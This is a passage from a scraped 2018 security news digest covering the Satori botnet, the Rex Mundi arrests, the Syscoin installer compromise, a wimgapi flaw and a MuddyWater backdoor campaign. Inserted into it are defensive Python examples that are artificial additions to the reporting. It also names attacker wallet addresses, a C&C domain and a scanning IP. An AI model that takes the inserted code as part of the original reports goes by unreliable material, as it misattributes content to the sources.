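    # Simulated sequence: user copies their ETH address, the hijacker rewrites
    # the clipboard, the guard inspects it right before the paste.
    print(check_paste(LEGIT_ETH, "0x004D3416DA40338fAf9E772388A93fAF5059bFd5"))  # swapped-known-bad
    print(check_paste(LEGIT_BTC, LEGIT_BTC))                                     # ok
```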

Below the balances of these addresses:

https://blockchain.info/address/1FoSfmjZJFqFSsD2cGXuccM9QMMa28Wrn1
https://blockchain.info/address/19gdjoWaE8i9XPbWoDbixev99MvvXUSNZL
https://etherscan.io/address/0x004D3416DA40338fAf9E772388A93fAF5059bFd5
Hackers have stolen a total of 0.12434321 BTC from eight transactions and no Ether, worth around $800 in total.

Recently Qihoo discovered many other miners, such as TaksHostMiner and WagonlitSwfMiner, that infected tens of thousands of machines.

“Recently, we have found that a lot of CryptoMiner Trojans are using this technique to steal victims’ cryptocurrencies.” concludes the company. “We strongly recommend users to enable antivirus software while installing new applications. Users are also recommended to run virus scan with 360 Total Security to avoid falling victim to CryptoMiner.”


Satori botnet is back again, experts observed a surge in port scan activity associated with it
17.6.2018 securityaffairs BotNet

This week, security experts observed a surge in port 8000 scan activity; researchers at Qihoo 360 Netlab determined that the unusual activity was associated with the Satori IoT botnet.
Experts from Qihoo 360 Netlab discovered that the authors of the Satori botnet integrated the proof-of-concept (PoC) exploit code for the XiongMai web server software package after it was published on June 8.

The code recently included in the Satori botnet exploits a buffer overflow vulnerability, tracked as CVE-2018-10088, in XiongMai uc-httpd 1.0.0. The exploit could be used by remote attackers to execute arbitrary code by sending a malformed packet via port 80 or 8000.

“Two days ago, on 2018-06-14, we noticed that an updated Satori botnet began to perform network wide scan looking for uc–httpd 1.0.0 devices.” reads the report published by Qihoo 360 Netlab.

“Most likely for the vulnerability of XiongMai uc–httpd 1.0.0 (CVE-2018-10088). The scanning activities led to a surge in scanning traffic on ports 80 and 8000.”

Satori botnet scan-on-port-80

Satori botnet scan-on-port-8000

The lightweight XiongMai uc-httpd web server is often included in the firmware of IoT devices from Chinese vendors.

Data collected by honeypots run by Qihoo 360 Netlab and SANS ISC confirms the Satori authors also included a second exploit, which allows the bot to target D-Link DSL-2750B devices.

The experts observed port 8000 scans drop off on June 15, when the attackers started using the PoC code against D-Link DSL-2750B routers via ports 80 and 8080.

Satori botnet scan on port 8080

The experts started seeing a surge in scans for the above ports, instead of port 8000 associated with XionMai.

Data collected by security experts demonstrates the evolution of the Satori botnet: its authors continue to add new exploits to make the botnet resilient to takedown attempts by law enforcement and security firms.

Further details, including Indicators of compromise (IoCs) for the Satori botnet are available in Qihoo 360 Netlab report.


Europol dismantled the Rex Mundi hacker crew, it arrested another member of the gang
16.6.2018 securityaffairs BigBrothers

Europol announced that several French nationals were arrested in the past year on suspicion of being involved with the notorious Rex Mundi crime gang.
Another Europol success made the headlines: the European police agency announced that several French nationals were arrested in the past year on suspicion of being involved with the notorious hacker group known as Rex Mundi (“King of the World”).

The Rex Mundi crime group has been active since at least 2012; it hacked into the systems of several organizations worldwide and attempted to blackmail them.

The list of the victims is long and includes AmeriCash Advance, Webassur, Drake International, Buy Way, Hoststar, Websolutions.it, Numericable, Habeas, AlfaNet, Domino’s Pizza, and the Swiss bank Banque Cantonale de Geneve (BCGE).


The hackers used to steal sensitive information from the victims, then they demanded fees for not disclosing the stolen data.

The operation coordinated by the Europol was launched in May 2017 after the group targeted a UK-based company. Crooks stole significant amounts of customer data from the company, then attempted to blackmail it by demanding the payment of a bitcoin ransom of nearly €580,000 ($670,000) for not disclosing the incident. The group also requested more than €825,000 ($776,000) for details on the hack.

The hackers also asked the victim for an additional €210,000 ($240,000) for each day the payment was delayed.

“A 25-year-old coder was arrested on 18 May by the Royal Thai Police based on a French international arrest warrant. The arrest of this young cybercriminal was the eighth in an international operation supported by Europol and the Joint Cybercrime Action Taskforce (J-CAT) that started exactly one year ago.” reads the announcement published by Europol.

“In May 2017 a British-based company was the victim of a cyber-attack during which a large amount of customer data was compromised. The attack was immediately claimed by an organisation called Rex Mundi.”

After the victim reported the incident to the authorities, the UK’s Metropolitan Police, the French National Police and Europol launched a joint operation that led to the identification of a French national.

“Within an hour, Europol’s 24/7 Operational Centre was able to link the available information to a French national,” continues the Europol.

In June 2017, the authorities identified and arrested five suspects, two were arrested in October 2017 and one on May 18, 2018.

All of the suspects are French nationals and they were all arrested by French police, except for the last arrest, which took place in Thailand.

The last member of the crew is a 25-year-old developer that was arrested last month by the Royal Thai Police.

The leader of the Rex Mundi group admitted blackmailing the company but claimed to have hired hackers on the Dark Web to hack the victims.


Singapore was hit by an unprecedented number of attacks during the Trump-Kim Summit
16.6.2018 securityaffairs BigBrothers

Researchers observed a spike in the number of cyber-attacks targeting Singapore during the Trump-Kim Summit, from June 11 to June 12.
Researchers at F5 Labs have observed a spike in the number of cyber-attacks targeting Singapore from June 11 to June 12, in the wake of the meeting between U.S. President Donald Trump and North Korean President Kim Jong-un in a Singapore hotel.

Experts remarked that Singapore is typically not a top attack destination, and the spike in the number of attacks coincides with the Trump-Kim meeting.

Most of the attacks originated from Russia (88% of overall attacks) and, frankly speaking, I’m not surprised, given the importance of the Trump-Kim summit.

According to F5 Labs and Loryka, 97% of all the attacks that originated from Russia from June 11 to June 12 targeted Singapore.

“From June 11 to June 12, 2018, F5 Labs, in concert with our data partner, Loryka, found that cyber-attacks targeting Singapore skyrocketed, 88% of which originated from Russia. What’s more, 97% of all attacks coming from Russia during this time period targeted Singapore.” reads the analysis published by F5 Labs. “We cannot prove they were nation-state sponsored attacks, however the attacks coincide with the day President Donald Trump met with North Korean President Kim Jong-un in a Singapore hotel.”

The attacks targeted a wide range of systems, from VoIP phones to IoT devices. They began from Brazil, targeting SIP port 5060 on IP phones, where communications are transmitted in clear text.

After this initial phase, which lasted for a couple of hours, researchers observed reconnaissance activity originating from the Russian IP address 188.246.234.60, which belongs to ASN 49505, operated by Selectel; the scans targeted a variety of ports.

None of the attacks originating from Russia carried malware.

“The number two attacked port was Telnet, consistent with IoT device attacks that could be leveraged to gain access to or listen in on targets of interest.” continues the analysis.

“Other ports attacked include the SQL database port 1433, web traffic ports 81 and 8080, port 7541, which was used by Mirai and Annie to target ISP-managed routers, and port 8291, which was targeted by Hajime to PDoS MikroTik routers.”

Singapore was hit by 40,000 attacks in just 21 hours, starting at 11:00 p.m. on June 11 through 8:00 p.m. June 12, local time.

The experts highlighted that only 8% were exploit attacks, while 92% were reconnaissance scans for potential targets.

Within that 21-hour window, 34% of the attacks originated from Russia; China, the US, France, and Italy rounded out the top five attacking countries.


During the summit time frame, Singapore was the top destination of cyber-attacks, it received 4.5 times more attacks than countries like the U.S. and Canada.

SIP port 5060 was targeted 25 times more often than Telnet port 23. The attackers were likely trying to gain access to insecure phones or the VoIP server, and to compromise IoT devices in order to spy on communications.

“We do not have evidence directly tying this attacking activity to nation-state-sponsored attacks, however it is common knowledge that the Russian government has many contractors within Russia doing their bidding, and that a successful attack on a target of interest would make its way through to the Kremlin,” F5 Labs concludes.


Syscoin Github has been breached, hacker replaced Syscoin Windows client with tainted version
16.6.2018 securityaffairs Cryptocurrency

The GitHub account of the Syscoin cryptocurrency was compromised by hackers that replaced the official Syscoin Windows client with a tainted version.
The Syscoin clients allow users to mine Syscoin cryptocurrency or manage Syscoin funds.


Only the Windows installers in the v3.0.4.1 release were replaced; the Mac and Linux clients were not tampered with.

The tainted version of the Syscoin Windows client contained the Arkei data stealer (aka Trojan:Win32/Feury.B!cl), a malicious code used to steal passwords and wallet private keys.

The Syscoin development team is warning users who downloaded the Syscoin Windows client version 3.0.4.1 between June 09, 2018 10:14 PM UTC and June 13, 2018 10:23 PM UTC that their machines might be infected.

“The Syscoin developers found that a malicious, unsigned copy of the Windows Syscoin 3.0.4.1 installer was made available via the Syscoin Github release page on June 9th, 2018 due to a compromised GitHub account. This installer contained malicious code. (Trojan:Win32/Feury.B!cl)” reads the security notice published by the development team.

“The virustotal scan of the malicious file named “re.exe” that is saved to the local temp folder (C:\Users\user\AppData\Local\Temp) upon running the fake installer: https://www.virustotal.com/#/file/b105d2db66865200d1b235c931026bf44428eb7327393bf76fdd4e96f1c622a1/detection”

The Syscoin team discovered the breach after users reported that Windows Defender SmartScreen, AVG and Kaspersky were flagging downloads of the Syscoin Windows client as malicious.

The affected executables are:

syscoincore-3.0.4-win32-setup.exe
syscoincore-3.0.4-win64-setup.exe
The Syscoin team removed the malicious files and issued a security notice with instructions for determining the installation date:

Right-click on syscoin-qt.exe in C:\Users\[USERNAME]\AppData\Roaming\SyscoinCore (or view the folder in detailed list mode) and make a note of the modified date.
OR go to Settings->Apps and make a note of the installation date.
If the modified/installation date is between June 9th, 2018, and June 13th, 2018, the team suggests that users take the following actions:

Backup any important data including wallets onto another storage medium outside of the affected computer. Treat this data cautiously as it may contain infectious code.
Run an up-to-date virus scanner on your system to remove the threat.
Passwords entered since the time of the infection should be changed from a separate device after ensuring the threat has been removed.
Funds in unencrypted wallets or wallets that had been unlocked during the infection period, should be moved to a newly generated wallet on a secure computer.
The Syscoin team announced additional measures to protect its users and their assets, such as the use of two-factor authentication (2FA) for its developers and routine file signature checks of the files available for download to detect any modification of the repository.

“We are working with Github to improve the release page experience to provide information regarding the modifying account as well as the last modification date of a release. This would allow users to detect if certain binaries were updated for potentially malicious purposes.” concludes the notice.

“All individuals responsible for Github releases should enable 2FA and ensure they have deterministic signature hashes for files on a regular basis.”
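The two controls the notice ends on, deterministic hashes for every release file and a way for users to tell whether they installed inside the compromise window, are simple to automate. The following is an added example and is not Syscoin's own tooling; the sha256sum-style manifest format, the helper names and the two constructed installer files are assumptions made for illustration. The compromise window itself is the one stated in the notice.

```python
import hashlib
import tempfile
from datetime import datetime, timezone
from pathlib import Path
from typing import Dict

# Window from the Syscoin notice above, in UTC.
WINDOW_START = datetime(2018, 6, 9, 22, 14, tzinfo=timezone.utc)
WINDOW_END = datetime(2018, 6, 13, 22, 23, tzinfo=timezone.utc)


def sha256_file(path: Path, chunk: int = 1 << 20) -> str:
    """Stream the file so large installers are not read into memory at once."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for block in iter(lambda: f.read(chunk), b""):
            h.update(block)
    return h.hexdigest()


def parse_manifest(text: str) -> Dict[str, str]:
    """sha256sum-style manifest (assumed format): '<hex digest>  <file name>' per line."""
    manifest = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        digest, name = line.split(None, 1)
        manifest[name.lstrip("*")] = digest.lower()  # '*' marks binary mode in sha256sum output
    return manifest


def verify_release(directory: Path, manifest: Dict[str, str]) -> Dict[str, str]:
    """Compare every file the manifest lists against what is actually on disk."""
    results = {}
    for name, expected in manifest.items():
        p = Path(directory) / name
        if not p.is_file():
            results[name] = "missing"
        elif sha256_file(p) == expected:
            results[name] = "ok"
        else:
            results[name] = "MISMATCH"
    return results


def installed_in_window(mtime_iso: str) -> bool:
    """True if an installer's modified/installed time (ISO 8601, e.g. the
    Explorer 'Modified' value converted to UTC) falls inside the window the
    notice gives. Naive timestamps are treated as UTC."""
    t = datetime.fromisoformat(mtime_iso)
    if t.tzinfo is None:
        t = t.replace(tzinfo=timezone.utc)
    return WINDOW_START <= t <= WINDOW_END


def demo() -> Dict[str, str]:
    """Constructed scenario: a manifest is produced from the genuine files,
    then one installer is swapped out after the fact, which is exactly the
    change a manifest published out-of-band would expose."""
    with tempfile.TemporaryDirectory() as d:
        win64 = Path(d) / "syscoincore-3.0.4-win64-setup.exe"
        win32 = Path(d) / "syscoincore-3.0.4-win32-setup.exe"
        win64.write_bytes(b"genuine win64 installer bytes")   # constructed content
        win32.write_bytes(b"genuine win32 installer bytes")   # constructed content
        manifest = parse_manifest(
            "\n".join(f"{sha256_file(p)}  {p.name}" for p in (win64, win32))
        )
        win32.write_bytes(b"trojanized win32 installer bytes")  # the attacker's swap
        return verify_release(Path(d), manifest)


if __name__ == "__main__":
    for name, status in demo().items():
        print(f"{status:9} {name}")
```

The check is only as strong as the manifest's provenance: an attacker who can replace a binary on the release page can replace an unsigned hash file sitting next to it, so the digests have to be signed with a key kept off the release pipeline, or published somewhere the compromised account cannot edit.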


Trump-Kim Summit Attracts Wave of Cyber-Attacks on Singapore
16.6.2018 securityweek BigBrothers

The number of cyber-attacks targeting Singapore skyrocketed from June 11 to June 12, during the meeting between U.S. President Donald Trump and North Korean President Kim Jong-un in a Singapore hotel, and most of these attacks originated from Russia, F5 Labs reports.

Russia has long been said to keep the United States under a continuous barrage of cyber-attacks, and even attracted a series of sanctions following the hacking aimed at the 2016 presidential election, which was supposedly the doing of state-sponsored Russian threat actors.

Thus, it’s no wonder the Trump-Kim summit earlier this week was targeted as well, but the number of assaults coming from Russia is indeed impressive: 88% of the total number of observed cyber-attacks came from this country. Furthermore, 97% of all the attacks that originated from Russia during the timeframe targeted Singapore, data from F5 Labs and Loryka reveals.

“We cannot prove they were nation-state sponsored attacks, however the attacks coincide with the day President Donald Trump met with North Korean President Kim Jong-un in a Singapore hotel. The attacks targeted VoIP phones and IoT devices, which appears to be more than a mere coincidence,” F5 says.

The flurry of attacks, the security firm reveals, started out of Brazil by targeting port SIP 5060, the single most attacked port in the timeframe. IP phones use this port to send and receive communications in clear text.

This initial phase, which lasted for only a couple of hours, was followed by reconnaissance scans from the Russian IP address 188.246.234.60 – an IP owned by ASN 49505, operated by Selectel – targeting a variety of ports.

The attacks observed on June 11 and June 12 also targeted the Telnet port, which is normally assaulted in Internet of Things (IoT) incidents. Other targeted ports include SQL database port 1433, web traffic ports 81 and 8080, port 7541 (used by Mirai and Annie to target ISP-managed routers), and port 8291 (previously targeted by Hajime).

During a period of 21 hours, starting at 11:00 p.m. on June 11 through 8:00 p.m. June 12, local time, a total of 40,000 attacks were launched on Singapore. Of these, 92% were reconnaissance scans looking for vulnerable devices, while the remaining 8% were exploit attacks.

“Thirty-four percent of the attacks originated from Russian IP addresses. China, US, France, and Italy round out the top 5 attackers in this period, all of which launched between 2.5 to 3 times fewer attacks than Russia. Brazil, in the sixth position, was the only other country we detected launching SIP attacks alongside Russia,” F5 reveals.

During the period, Singapore became the top destination of cyber-attacks by a large margin, receiving 4.5 times more attacks than the U.S. or Canada. Typically, Singapore is not a top attack destination, and the anomaly coincides with President Trump’s meeting with Kim Jong-un.

While Russia was the main source of attacks, accounting for 88% of them, Brazil was the second largest attacker, launching 8% of the assaults. Germany rounded out the top three, with 2%.

The security researchers also note that there was no attempt made to conceal the attacks launched from Russia and that none of the attacks originating from this country carried malware.

The SIP port 5060 received 25 times more attacks than Telnet port 23, which was the second most targeted. Although attacks on port 5060 are unusual, chances are that the attackers were attempting to gain access to insecure phones or perhaps the VoIP server. The attacks on Telnet were likely trying to compromise IoT devices to spy on communications and collect data.

“We do not have evidence directly tying this attacking activity to nation-state-sponsored attacks, however it is common knowledge that the Russian government has many contractors within Russia doing their bidding, and that a successful attack on a target of interest would make its way through to the Kremlin,” F5 concludes.
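The breakdown F5 Labs gives above (and in the securityaffairs write-up of the same report earlier on this page), counts by destination port, by source country, the recon-versus-exploit split and the single address that swept many ports, is easy to reproduce over your own honeypot or firewall telemetry. The following is an added example and is not F5 or Loryka code; the one-event-per-line log format, the port-role labels and the sample records (RFC 5737 documentation addresses) are constructed for illustration.

```python
import re
from collections import Counter
from dataclasses import dataclass
from typing import Dict, Iterable, List

# Shorthand labels for the ports named in the F5 Labs write-up.  The labels
# are this example's, not F5's.
PORT_ROLE: Dict[int, str] = {
    5060: "SIP (cleartext VoIP signalling)",
    23: "Telnet (IoT)",
    1433: "MS SQL",
    81: "HTTP alternate",
    8080: "HTTP alternate",
    7541: "ISP-managed routers (Mirai/Annie)",
    8291: "MikroTik Winbox (Hajime)",
}

# Constructed log format: timestamp, source IP, source country code,
# destination port, and whether the sensor saw an exploit attempt or a probe.
LINE_RE = re.compile(
    r"^(?P<ts>\S+) src=(?P<src>[\d.]+) cc=(?P<cc>[A-Z]{2}) "
    r"dpt=(?P<dpt>\d+) kind=(?P<kind>recon|exploit)$"
)


@dataclass(frozen=True)
class Event:
    ts: str
    src: str
    cc: str
    dpt: int
    kind: str


def parse_events(lines: Iterable[str]) -> List[Event]:
    """Parse log lines, skipping anything that does not match the format."""
    events = []
    for line in lines:
        m = LINE_RE.match(line.strip())
        if m:
            events.append(Event(m["ts"], m["src"], m["cc"], int(m["dpt"]), m["kind"]))
    return events


def summarize(events: List[Event]) -> dict:
    """Per-port, per-country and recon-vs-exploit breakdown, as in the report."""
    by_port = Counter(e.dpt for e in events)
    by_cc = Counter(e.cc for e in events)
    by_kind = Counter(e.kind for e in events)
    total = len(events)
    sip, telnet = by_port.get(5060, 0), by_port.get(23, 0)
    return {
        "total": total,
        "by_port": dict(by_port),
        "by_cc": dict(by_cc),
        "top_source": by_cc.most_common(1)[0][0] if by_cc else None,
        "recon_share": by_kind["recon"] / total if total else 0.0,
        # the ratio F5 quotes as "25 times more" for SIP versus Telnet
        "sip_to_telnet": sip / telnet if telnet else float("inf"),
        "port_roles": {p: PORT_ROLE.get(p, "other") for p in by_port},
    }


def wide_scanners(events: List[Event], min_ports: int = 5) -> Dict[str, List[int]]:
    """Sources that probed many distinct ports: the reconnaissance pattern the
    report attributes to one Selectel-hosted address."""
    ports: Dict[str, set] = {}
    for e in events:
        ports.setdefault(e.src, set()).add(e.dpt)
    return {src: sorted(p) for src, p in ports.items() if len(p) >= min_ports}


# Constructed sample telemetry; the last line is deliberately malformed.
SAMPLE_LOG = """\
2018-06-11T23:02:10Z src=203.0.113.7 cc=BR dpt=5060 kind=exploit
2018-06-11T23:02:11Z src=203.0.113.7 cc=BR dpt=5060 kind=exploit
2018-06-11T23:05:00Z src=203.0.113.9 cc=BR dpt=5060 kind=recon
2018-06-12T01:10:03Z src=198.51.100.20 cc=RU dpt=5060 kind=recon
2018-06-12T01:10:04Z src=198.51.100.20 cc=RU dpt=23 kind=recon
2018-06-12T01:10:05Z src=198.51.100.20 cc=RU dpt=1433 kind=recon
2018-06-12T01:10:06Z src=198.51.100.20 cc=RU dpt=8080 kind=recon
2018-06-12T01:10:07Z src=198.51.100.20 cc=RU dpt=7541 kind=recon
2018-06-12T01:10:08Z src=198.51.100.20 cc=RU dpt=8291 kind=recon
2018-06-12T01:10:09Z src=198.51.100.20 cc=RU dpt=81 kind=recon
2018-06-12T02:00:00Z src=198.51.100.21 cc=RU dpt=5060 kind=recon
2018-06-12T02:00:01Z src=198.51.100.21 cc=RU dpt=5060 kind=recon
2018-06-12T03:00:00Z src=192.0.2.5 cc=CN dpt=23 kind=exploit
2018-06-12T03:00:01Z src=192.0.2.6 cc=US dpt=8080 kind=recon
malformed sensor line that the parser must skip
"""

if __name__ == "__main__":
    evs = parse_events(SAMPLE_LOG.splitlines())
    for key, value in summarize(evs).items():
        print(f"{key}: {value}")
    print("wide scanners:", wide_scanners(evs))
```

Attribution by source country, as in the report itself, is only a statement about where the scanning infrastructure sits; the same script run against a day of baseline traffic is what turns a country or port count into an anomaly worth escalating.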


Microsoft Patches Code Execution Vulnerability in wimgapi Library
16.6.2018 securityweek Vulnerebility

Microsoft this week patched a remote code execution vulnerability affecting the wimgapi library, which is used to perform operations on Windows Imaging Format (WIM) files.

Addressed as part of Microsoft’s June 2018 Patch Tuesday, the issue was discovered by Talos’ Marcin Noga in the LoadIntegrityInfo function of wimgapi version 10.0.16299.15 (WinBuild.160101.0800). An attacker exploiting the flaw could use a specially crafted WIM image to cause heap corruption and achieve direct code execution.

Tracked as CVE-2018-8210, the vulnerability resides in the DLL used to perform operations on the file-based disk image format that Microsoft created to simplify the deployment of Windows systems. The bug manifests in the LoadIntegrityInfo function when a WIM file header is parsed and can be triggered “even on the simplest operations performed on malformed WIM file,” the researcher says.

“For example, it is enough if an application tries to open the WIM file via the WIMCreateFile function and requests a file handle. The function allocates heap memory based on a user-controlled size value, and uses another user-controlled value to read n bytes from the file into this buffer. It is using these values without any prior input checks,” Noga explains.

An attacker exploiting the vulnerability could execute malicious code with the same access rights as the logged-in user. They could also crash the system with a denial-of-service attack, the researcher says. Because WIM files do not have a registered file type handler by default, the issue cannot be triggered if the user double-clicks a WIM file, unless a file-handler was registered first.
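The failure Noga describes, an allocation sized by one header field and a read bounded by another with neither validated against the file, is the classic shape of heap corruption in file parsers. The following is an added example, not Talos or Microsoft code, showing the checks a hardened loader performs before trusting either value. The header layout (8-byte magic followed by a 64-bit table size and a 64-bit table offset), the 16 MiB cap and the helper names are constructed for illustration and are a simplified model, not the real WIM on-disk format.

```python
import struct

# Simplified model of the pattern Talos describes: a header carries the size
# and file offset of a table; the loader allocates `size` bytes and reads
# `size` bytes from `offset`.  Only the 8-byte "MSWIM" magic is taken from
# the real format; the rest of this layout is constructed for the example.
MAGIC = b"MSWIM\x00\x00\x00"
HEADER = struct.Struct("<8sQQ")      # magic, table_size, table_offset
MAX_TABLE_BYTES = 16 * 1024 * 1024   # sanity cap; an assumption, not a spec value


class MalformedWim(ValueError):
    """Raised instead of trusting attacker-controlled size/offset fields."""


def load_integrity_table(blob: bytes, max_table: int = MAX_TABLE_BYTES) -> bytes:
    """Hardened loader.  Each check below is a validation that the described
    vulnerable path lacked: there, size and offset fed the allocation and the
    read directly."""
    if len(blob) < HEADER.size:
        raise MalformedWim("file shorter than header")
    magic, size, offset = HEADER.unpack_from(blob, 0)
    if magic != MAGIC:
        raise MalformedWim("bad magic")
    if size == 0:
        return b""                                   # no integrity table present
    if size > max_table:
        raise MalformedWim(f"table size {size} exceeds cap {max_table}")
    if offset < HEADER.size:
        raise MalformedWim("table overlaps header")
    # Python integers cannot overflow; in C, check offset <= SIZE_MAX - size
    # before computing offset + size, or the bound below can wrap and pass.
    end = offset + size
    if end > len(blob):
        raise MalformedWim(f"table [{offset}, {end}) extends past EOF {len(blob)}")
    return blob[offset:end]


def classify(blob: bytes) -> str:
    """'ok' or the reason the image was rejected; handy for fuzz triage."""
    try:
        load_integrity_table(blob)
        return "ok"
    except MalformedWim as exc:
        return f"rejected: {exc}"


def make_wim(table: bytes) -> bytes:
    """Well-formed image: the table sits immediately after the header."""
    return HEADER.pack(MAGIC, len(table), HEADER.size) + table


def make_crafted(size: int, offset: int, body: bytes = b"\x00" * 32) -> bytes:
    """Attacker-style header with arbitrary size/offset fields (constructed)."""
    return HEADER.pack(MAGIC, size, offset) + body


if __name__ == "__main__":
    print(classify(make_wim(b"integrity-bytes")))
    print(classify(make_crafted(1 << 40, HEADER.size)))   # huge allocation
    print(classify(make_crafted(16, 1 << 40)))            # read far past EOF
```

The ordering matters: the size cap is checked before the offset arithmetic so a huge size never reaches the allocator, and the end-of-file bound is computed after the overlap check so a table cannot be made to alias the header it was described by.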

According to Talos, the vulnerability has a CVSSv3 score of 8.8. Microsoft, on the other hand, rates it at 7.3 and classifies it as Important.

The remote code execution vulnerability “exists when Windows improperly handles objects in memory,” the software giant explains. The company also notes that an attacker able to successfully exploit the issue could control a vulnerable system.

Microsoft also adds that an attacker targeting the vulnerability “would first have to log on to the target system and then run a specially crafted application.”

To address the vulnerability, Microsoft released an update that corrects the manner in which Windows handles objects in memory. No mitigations or workarounds exist for this vulnerability, meaning that users need to install the recently released patch to keep systems safe.

Impacted products include Windows 10 (both 32-bit and 64-bit versions), Windows 8.1 (32-bit and 64-bit), Windows RT 8.1, Windows Server 2012, Windows Server 2012 R2, Windows Server 2016, Windows Server version 1709, and Windows Server version 1803.


French Nationals Arrested for 'Rex Mundi' Hacks
16.6.2018 securityweek BigBrothers

Europol announced this week that several French nationals were arrested in the past year on suspicion of being involved with Rex Mundi, a group that hacked into the systems of several organizations and attempted to blackmail them.

According to Europol, the alleged members of the hacker group were identified after in May 2017 they targeted a UK-based company. The cybercriminals stole significant amounts of customer data from the firm and demanded the payment of a bitcoin ransom of nearly €580,000 ($670,000) for not making the stolen files public or more than €825,000 ($776,000) for information on how the attack was carried out. The hackers also told the victim that the amounts would increase by €210,000 ($240,000) for each day the payment was delayed.

After the victim reported the attack to law enforcement, the UK’s Metropolitan Police, the French National Police and Europol teamed up to identify the hackers. “Within an hour, Europol’s 24/7 Operational Centre was able to link the available information to a French national,” Europol said.

Five suspects were arrested in June 2017, two were arrested in October 2017 and one was apprehended on May 18, 2018. All of the suspects are French nationals and they were all arrested by French police, except for the last arrest, which took place in Thailand.

The individual who was arrested last month by the Royal Thai Police is a 25-year-old developer. The suspects arrested in October 2017 were described as “hackers.” The “main suspect,” as Europol describes him, admitted blackmailing companies, but claimed to have used the dark web to hire someone to conduct the hacking.

Rex Mundi had been active since at least 2012, and until 2015 it publicized many of its operations in the hope of pressuring victims into paying. Its victims included AmeriCash Advance, Webassur, Drake International, Buy Way, Hoststar, Websolutions.it, Numericable, Habeas, AlfaNet, Domino’s Pizza, and the Swiss bank Banque Cantonale de Geneve (BCGE). Many of the hacker group’s victims were Belgian companies.


New Campaign Possibly Linked to MuddyWater
16.6.2018 securityweek CyberSpy

A newly discovered attack relying on malicious Word documents and PowerShell scripts appears related to the MuddyWater cyber-espionage campaign, Trend Micro reports.

First observed in 2017, the MuddyWater campaign was targeting the Saudi government with PowerShell scripts deployed via Microsoft Office Word macros. A similar espionage campaign observed in March 2018 was targeting organizations in Turkey, Pakistan and Tajikistan.

The attacks, which are difficult to attribute, were previously associated with the FIN7 hacking group, but artifacts observed in multiple assaults were also linked to a single framework last year.

Discovered last month, the new campaign bears the hallmarks of MuddyWater and attempts to distribute a backdoor through Word documents that execute PowerShell scripts, Trend Micro says. Unlike previous attacks, however, the samples don’t attempt to download the scripts, but have them encoded in the document itself.

The campaign, however, does have characteristics that appear to connect it to the MuddyWater attacks, such as the use of malicious documents with embedded macros, and the obfuscation method used for the macro scripts.

A lure document claiming to be a reward or a promotion was used as part of the new attack, instead of the previously seen documents dealing with government or telecommunications-related issues. Because of this change, Trend Micro suggests that the attacks would no longer be limited to specific industries or organizations.

Once the intended victim opens the document, they are enticed into enabling the macro to view its full content. The macro uses the Document_Open() event to execute a malicious routine. Two PowerShell scripts are executed, with the second being designed to drop various components on the compromised machine.

The final payload used in this campaign is the PRB-Backdoor remote access Trojan (RAT) that was previously analyzed in May 2018. The malware communicates with a command and control (C&C) server at outl00k[.]net and includes support for a broad range of commands.

Based on the received instructions, the malware can initialize a connection with the C&C, register the infected system, gather browsing history from installed browsers and send it to the C&C, steal passwords found in the browser, read and write files, execute shell commands, log keystrokes, capture screenshots, update functions, gather system information, and initialize DNS sessions.

Last month, the security researcher behind Security 0wnage revealed that there was no reference to PRB-Backdoor or its code on public sources.

“If these samples are indeed related to MuddyWater, this means that the threat actors behind MuddyWater are continuously evolving their tools and techniques to make them more effective and persistent,” Trend Micro notes.


India-based Network Intelligence Raises $4.8 Million for Expansion
16.6.2018 securityweek IT

Bengaluru, India-based security services and products firm Network Intelligence Inc (NII) has raised Rs 33-crore funding (approximately $4.8 million) from private equity firm Helix Investments. The money will be used for product development and to expand operations in the U.S. and Europe. The investment values the firm at $22.7 million.

NII was founded in 2001, and provides information security services, consultancy and products. It offers assessment, advisory, remediation, training, and managed services; and is an Indian VAR for leading global security firms and products -- such as McAfee, Imperva, Cyber-Ark and FortiGate. NII also sells its own products, Firesec and Insight.

Firesec delivers an analysis of firewall rules for medium to large enterprises. It can purge redundant rules, group similar rules, and find vulnerable rule patterns. Insight is a vulnerability management suite that can manage assets, assess vulnerabilities, and determine compliance status.

"We are going to deploy the funds for two purposes," said KK Mookhey, CEO of NII: "expanding to the US and Europe and to enhance product development initiatives. Around 60% of our revenues are from the banking, financial services and insurance (BFSI) sector and the rest from critical infrastructure like oil and gas and also from IT."

NII employs around 450 people, primarily in India and the Middle East. Its operations centers are in Mumbai and Dubai, and it has recently established operations in the U.S. and Singapore.

Helix Investment is an India-focused private equity fund that aims to invest around $20 million annually in India -- typically at around $5 million to $15 million at a time. The fund is sponsored by Culbro LLC, the private equity investment vehicle of the Cullman family of New York and by Bloomingdale Properties, a US based investment and real estate company.


A new MuddyWater Campaign spreads Powershell-based PRB-Backdoor
16.6.2018 securityaffairs APT

Trend Micro spotted a new attack relying on weaponized Word documents and PowerShell scripts that appears related to the MuddyWater APT.
Security experts at Trend Micro have spotted a new attack relying on weaponized Word documents and PowerShell scripts that appears related to the MuddyWater cyber-espionage campaign.

The first MuddyWater campaign was observed in late 2017, when researchers from Palo Alto Networks were investigating a mysterious wave of attacks in the Middle East.

The experts called the campaign ‘MuddyWater’ because of the confusion in attributing these attacks, which took place between February and October 2017 and targeted entities in Saudi Arabia, Iraq, Israel, the United Arab Emirates, Georgia, India, Pakistan, Turkey, and the United States.

The threat actors used a PowerShell-based first-stage backdoor named POWERSTATS; over time, they changed their tools and techniques.

In March 2018, experts at FireEye uncovered a massive phishing campaign conducted by the TEMP.Zagros group (another name used to track MuddyWater), targeting Asia and the Middle East from January 2018 to March 2018.

Attackers used weaponized documents typically having geopolitical themes, such as documents purporting to be from the National Assembly of Pakistan or the Institute for Development and Research in Banking Technology.

The attacks were mistakenly associated with the FIN7 group: when Palo Alto discovered the first campaign, it reported that a C&C server delivering the FIN7-linked DNSMessenger tool was also involved in MuddyWater attacks.

The new campaign discovered by the experts presents many similarities with previous ones conducted by the same threat actor, attackers attempted to distribute a backdoor through weaponized Word documents that execute PowerShell scripts.

“In May 2018, we found a new sample (Detected as W2KM_DLOADR.UHAOEEN) that may be related to this campaign. Like the previous campaigns, these samples again involve a Microsoft Word document embedded with a malicious macro that is capable of executing PowerShell (PS) scripts leading to a backdoor payload.” reads the analysis published by Trend Micro.

“One notable difference in the analyzed samples is that they do not directly download the Visual Basic Script(VBS) and PowerShell component files, and instead encode all the scripts on the document itself. The scripts will then be decoded and dropped to execute the payload without needing to download the component files.”

Unlike previous campaigns, the samples don’t download the malicious scripts at all; the scripts are encoded in the document itself.

